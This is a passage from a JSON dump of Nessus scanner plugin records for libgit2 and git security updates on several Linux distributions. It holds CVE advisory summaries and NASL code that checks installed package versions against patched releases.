(bsc#1085256).\n\n - CVE-2018-11235: With a crafted .gitmodules file, a malicious project can execute an arbitrary script on a machine that runs 'git clone --recurse-submodules' because submodule 'names' are obtained from this file, and then appended to $GIT_DIR/modules, leading to directory traversal with '../' in a name. 
Finally, post-checkout hooks from a submodule are executed, bypassing the intended design in which hooks are not obtained from a remote server. (bsc#1095219)\n\n - CVE-2018-10887: It has been discovered that an unexpected sign extension in git_delta_apply function in delta.c file may have lead to an integer overflow which in turn leads to an out of bound read, allowing to read before the base object. An attacker could have used this flaw to leak memory addresses or cause a Denial of Service. (bsc#1100613)\n\n - CVE-2018-10888: A missing check in git_delta_apply function in delta.c file, may lead to an out-of-bound read while reading a binary delta file. An attacker may use this flaw to cause a Denial of Service.\n (bsc#1100612)\n\n - CVE-2018-15501: A remote attacker can send a crafted smart-protocol 'ng' packet that lacks a '\\0' byte to trigger an out-of-bounds read that leads to DoS.\n (bsc#1104641)\n\nThis update was imported from the SUSE:SLE-12-SP2:Update update project.", "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H"}, "published": "2018-10-29T00:00:00", "type": "nessus", "title": "openSUSE Security Update : libgit2 (openSUSE-2018-1314)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-10887", "CVE-2018-10888", "CVE-2018-11235", "CVE-2018-15501", "CVE-2018-8099"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:libgit2-24", "p-cpe:/a:novell:opensuse:libgit2-24-32bit", "p-cpe:/a:novell:opensuse:libgit2-24-debuginfo", "p-cpe:/a:novell:opensuse:libgit2-24-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libgit2-debugsource", "p-cpe:/a:novell:opensuse:libgit2-devel", "cpe:/o:novell:opensuse:42.3"], "id": "OPENSUSE-2018-1314.NASL", "href": "https://www.tenable.com/plugins/nessus/118486", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2018-1314.\n#\n# 
The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(118486);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2018-10887\", \"CVE-2018-10888\", \"CVE-2018-11235\", \"CVE-2018-15501\", \"CVE-2018-8099\");\n\n script_name(english:\"openSUSE Security Update : libgit2 (openSUSE-2018-1314)\");\n script_summary(english:\"Check for the openSUSE-2018-1314 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for libgit2 fixes the following issues :\n\n - CVE-2018-8099: Fixed possible denial of service attack\n via different vectors by not being able to differentiate\n between these status codes (bsc#1085256).\n\n - CVE-2018-11235: With a crafted .gitmodules file, a\n malicious project can execute an arbitrary script on a\n machine that runs 'git clone --recurse-submodules'\n because submodule 'names' are obtained from this file,\n and then appended to $GIT_DIR/modules, leading to\n directory traversal with '../' in a name. Finally,\n post-checkout hooks from a submodule are executed,\n bypassing the intended design in which hooks are not\n obtained from a remote server. (bsc#1095219)\n\n - CVE-2018-10887: It has been discovered that an\n unexpected sign extension in git_delta_apply function in\n delta.c file may have lead to an integer overflow which\n in turn leads to an out of bound read, allowing to read\n before the base object. An attacker could have used this\n flaw to leak memory addresses or cause a Denial of\n Service. (bsc#1100613)\n\n - CVE-2018-10888: A missing check in git_delta_apply\n function in delta.c file, may lead to an out-of-bound\n read while reading a binary delta file. 
An attacker may\n use this flaw to cause a Denial of Service.\n (bsc#1100612)\n\n - CVE-2018-15501: A remote attacker can send a crafted\n smart-protocol 'ng' packet that lacks a '\\0' byte to\n trigger an out-of-bounds read that leads to DoS.\n (bsc#1104641)\n\nThis update was imported from the SUSE:SLE-12-SP2:Update update\nproject.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1085256\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1095219\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1100612\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1100613\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1104641\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libgit2 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgit2-24\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgit2-24-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgit2-24-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgit2-24-debuginfo-32bit\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgit2-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgit2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/10/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libgit2-24-0.24.1-10.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libgit2-24-debuginfo-0.24.1-10.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libgit2-debugsource-0.24.1-10.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libgit2-devel-0.24.1-10.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", 
reference:\"libgit2-24-32bit-0.24.1-10.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"libgit2-24-debuginfo-32bit-0.24.1-10.3.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libgit2-24 / libgit2-24-32bit / libgit2-24-debuginfo / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:31:28", "description": "CVE-2018-15501 A potential out-of-bounds read when processing a 'ng' smart packet might lead to a Denial of Service.\n\nCVE-2018-10887 A flaw has been discovered that may lead to an integer overflow which in turn leads to an out of bound read, allowing to read before the base object. This might be used to leak memory addresses or cause a Denial of Service.\n\nCVE-2018-10888 A flaw may lead to an out-of-bound read while reading a binary delta file. This might result in a Denial of Service.\n\nFor Debian 8 'Jessie', these problems have been fixed in version 0.21.1-3+deb8u1.\n\nWe recommend that you upgrade your libgit2 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H"}, "published": "2018-08-28T00:00:00", "type": "nessus", "title": "Debian DLA-1477-1 : libgit2 security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-10887", "CVE-2018-10888", "CVE-2018-15501"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:libgit2-21", "p-cpe:/a:debian:debian_linux:libgit2-dbg", "p-cpe:/a:debian:debian_linux:libgit2-dev", "cpe:/o:debian:debian_linux:8.0"], "id": "DEBIAN_DLA-1477.NASL", "href": "https://www.tenable.com/plugins/nessus/112126", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-1477-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(112126);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2018-10887\", \"CVE-2018-10888\", \"CVE-2018-15501\");\n\n script_name(english:\"Debian DLA-1477-1 : libgit2 security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"CVE-2018-15501 A potential out-of-bounds read when processing a 'ng'\nsmart packet might lead to a Denial of Service.\n\nCVE-2018-10887 A flaw has been discovered that may lead to an integer\noverflow which in turn leads to an out of bound read, allowing to read\nbefore the base object. 
This might be used to leak memory addresses or\ncause a Denial of Service.\n\nCVE-2018-10888 A flaw may lead to an out-of-bound read while reading a\nbinary delta file. This might result in a Denial of Service.\n\nFor Debian 8 'Jessie', these problems have been fixed in version\n0.21.1-3+deb8u1.\n\nWe recommend that you upgrade your libgit2 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2018/08/msg00024.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/libgit2\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libgit2-21\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libgit2-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libgit2-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/08/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/08/28\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"libgit2-21\", reference:\"0.21.1-3+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libgit2-dbg\", reference:\"0.21.1-3+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libgit2-dev\", reference:\"0.21.1-3+deb8u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:P"}}, {"lastseen": "2021-08-19T12:31:44", "description": "Update to 0.26.4 (CVE-2018-11235)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-07-06T00:00:00", "type": "nessus", "title": "Fedora 27 : libgit2 (2018-94eb743dad)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11235"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:libgit2", "cpe:/o:fedoraproject:fedora:27"], "id": "FEDORA_2018-94EB743DAD.NASL", "href": "https://www.tenable.com/plugins/nessus/110932", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network 
Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-94eb743dad.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(110932);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2018-11235\");\n script_xref(name:\"FEDORA\", value:\"2018-94eb743dad\");\n\n script_name(english:\"Fedora 27 : libgit2 (2018-94eb743dad)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to 0.26.4 (CVE-2018-11235)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-94eb743dad\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libgit2 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:libgit2\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/o:fedoraproject:fedora:27\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/07/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/07/06\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^27([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 27\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC27\", reference:\"libgit2-0.26.4-1.fc27\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libgit2\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:31:47", "description": "According to the version of the git packages installed, the EulerOS installation on the remote host is affected by the following vulnerability :\n\n - arbitrary code execution when recursively cloning a malicious repository (CVE-2018-11235)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-07-03T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP3 : git (EulerOS-SA-2018-1216)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11235"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:git", "p-cpe:/a:huawei:euleros:perl-Git", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2018-1216.NASL", "href": "https://www.tenable.com/plugins/nessus/110880", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(110880);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2018-11235\"\n );\n\n script_name(english:\"EulerOS 2.0 SP3 : git (EulerOS-SA-2018-1216)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the git packages installed, the EulerOS\ninstallation on the remote host is affected by the following\nvulnerability :\n\n - arbitrary code execution when recursively cloning a\n malicious repository (CVE-2018-11235)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2018-1216\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?45ea2788\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected git package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/07/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:perl-Git\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(3)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP3\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP3\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"git-1.8.3.1-14.h1\",\n \"perl-Git-1.8.3.1-14.h1\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"3\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"git\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:20:43", "description": "The remote NewStart CGSL host, running version CORE 5.04 / MAIN 5.04, has git packages 
installed that are affected by a vulnerability:\n\n - In Git before 2.13.7, 2.14.x before 2.14.4, 2.15.x before 2.15.2, 2.16.x before 2.16.4, and 2.17.x before 2.17.1, remote code execution can occur. With a crafted .gitmodules file, a malicious project can execute an arbitrary script on a machine that runs git clone\n --recurse-submodules because submodule names are obtained from this file, and then appended to $GIT_DIR/modules, leading to directory traversal with ../ in a name. Finally, post-checkout hooks from a submodule are executed, bypassing the intended design in which hooks are not obtained from a remote server.\n (CVE-2018-11235)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-08-12T00:00:00", "type": "nessus", "title": "NewStart CGSL CORE 5.04 / MAIN 5.04 : git Vulnerability (NS-SA-2019-0027)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11235"], "modified": "2021-01-14T00:00:00", "cpe": [], "id": "NEWSTART_CGSL_NS-SA-2019-0027_GIT.NASL", "href": "https://www.tenable.com/plugins/nessus/127189", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\n# The descriptive text and package checks in this plugin were\n# extracted from ZTE advisory NS-SA-2019-0027. 
The text\n# itself is copyright (C) ZTE, Inc.\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(127189);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2018-11235\");\n\n script_name(english:\"NewStart CGSL CORE 5.04 / MAIN 5.04 : git Vulnerability (NS-SA-2019-0027)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote machine is affected by a vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote NewStart CGSL host, running version CORE 5.04 / MAIN 5.04, has git packages installed that are affected by a\nvulnerability:\n\n - In Git before 2.13.7, 2.14.x before 2.14.4, 2.15.x\n before 2.15.2, 2.16.x before 2.16.4, and 2.17.x before\n 2.17.1, remote code execution can occur. With a crafted\n .gitmodules file, a malicious project can execute an\n arbitrary script on a machine that runs git clone\n --recurse-submodules because submodule names are\n obtained from this file, and then appended to\n $GIT_DIR/modules, leading to directory traversal with\n ../ in a name. Finally, post-checkout hooks from a\n submodule are executed, bypassing the intended design in\n which hooks are not obtained from a remote server.\n (CVE-2018-11235)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/notice/NS-SA-2019-0027\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the vulnerable CGSL git packages. Note that updated packages may not be available yet. 
Please contact ZTE for\nmore information.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-11235\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/07/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/08/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"NewStart CGSL Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. 
